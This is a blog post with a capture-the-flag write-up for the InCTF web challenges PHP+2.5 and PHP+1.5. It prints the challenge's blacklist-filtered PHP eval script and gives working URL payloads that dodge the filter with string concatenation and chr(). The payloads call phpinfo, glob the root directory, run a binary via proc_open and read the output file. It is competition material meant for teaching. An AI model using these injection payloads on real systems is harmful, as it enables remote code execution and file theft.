ふるつき

v(*'='*)v かに

InCTF Writeup

I played InCTF as a member of zer0pts. We reached 22nd place and got 2302 points. It was a very good CTF. Thanks all the admins for holding such a great competition!

I solved PHP+1.5 and PHP+2.5 during the competition. Write it up.

[Web 744points] PHP+2.5

The given url evaluated our PHP code. There were some restrictions: our code couldn't include any defined function names, specific symbols and language constructs, and its length should be shorter than 100 bytes. In details, see the following script.

<?php

$input = $_GET['input'];

function check(){
  global $input;
  foreach (get_defined_functions()['internal'] as $blacklisted) {
      if (preg_match ('/' . $blacklisted . '/im', $input)) {
          echo "Your input is blacklisted" . "<br>";
          return true;
          break;
      }
  }
  $blacklist = "exit|die|eval|\[|\]|\\\|\*|`|-|\+|~|\{|\}|\"|\'";
  if(preg_match("/$blacklist/i", $input)){
    echo "Do you really you need that?" . "<br>";
    return true;
  }

  unset($blacklist);
  if(strlen($input)>100){  #That is random no. I took ;)
    echo "This is getting really large input..." . "<br>";
    return true;
  }  
  return false;
}

$thisfille=$_GET['thisfile'];

if(is_file($thisfille)){
  echo "You can't use inner file" . "<br>";
}
else{
  if(file_exists($thisfille)){
    if(check()){
      echo "Naaah" . "<br>";
    }else{
      eval($input);
    }
  }else{
    echo "File doesn't exist" . "<br>";
  }

}

function iterate($ass){
    foreach($ass as $hole){
        echo "AssHole";
    }
}

highlight_file(__FILE__);
?>

At first, I saw the phpinfo with the this payload: ?thisfile=/&input=$x=php.info;$x();. Because PHP assumes an undefined identifier as a string and supports variable functions, this payload calls phpinfo().

By the phpinfo, I found that some functions that execute commands and read from and write to files were disabled. However, proc_open and file were still enabled. So we might execute arbitrary commands and read arbitrary files.

When I was globbing the root directory (payload is /?thisfile=/&input=$x=ch.r;$d=va.$x(114).$x(95).dump;$g=glo.b;$d($g($x(47).$x(42)));, there was a /readFile executable. We should execute this one.

I used chr, proc_open, hex2bin, file, and var_dump to get the flag. After executing /readFile>/tmp/x by proc_open, then read it by file and output by var_dump. My payloads are here.

  1. doproc_open("/r*>/tmp/x",[],$z);: ?thisfile=/&input=$x=c.hr;$f=proc.$x(95).open;$g=hex.$x(50).bin;$f($g($x(50).f722a3e2f746d702f78),array(),$z);
  2. do var_dump(file("/tmp/x"));: ?thisfile=/&input=$x=c.hr;$f=va.$x(114).$x(95).dump;$g=fil.e;$a=$x(47).tmp.$x(47).x;$f($g($a));

Got the result! FLAG: inctf{Getting_segmentation_fault is_fun}

Unintended solution :P

[Web 100points] PHP+1.5

Same as PHP+2.5